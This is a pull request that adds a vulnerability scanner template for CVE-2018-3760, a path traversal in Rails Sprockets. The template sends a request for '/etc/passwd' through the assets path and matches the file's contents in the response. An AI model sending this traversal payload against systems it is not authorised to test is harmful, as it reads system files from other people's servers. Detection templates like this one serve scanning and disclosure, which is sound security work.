### PR TITLE
CVE-2018-3760 Rails

### DIFF
--- a/cves/CVE-2018-3760.yaml
+++ b/cves/CVE-2018-3760.yaml
@@ -1,4 +1,4 @@
-id: Rails CVE-2018-3760
+id: cve-2018-3760
 
 info:
   name: Rails cve-2018-3760

--- a/cves/CVE-2018-3760.yaml
+++ b/cves/CVE-2018-3760.yaml
@@ -1,0 +1,19 @@
+id: Rails CVE-2018-3760
+
+info:
+  name: Rails cve-2018-3760
+  author: 0xrudra
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
+    matchers:
+      - type: status
+        status:
+            - 200
+      - type: regex
+        regex:
+            - "root:[x*]:0:0:"
+        part: body


### PR DESCRIPTION
POC for Sprockets<=3.7.1 CVE-2018-3760

Reference:
* https://blog.heroku.com/rails-asset-pipeline-vulnerability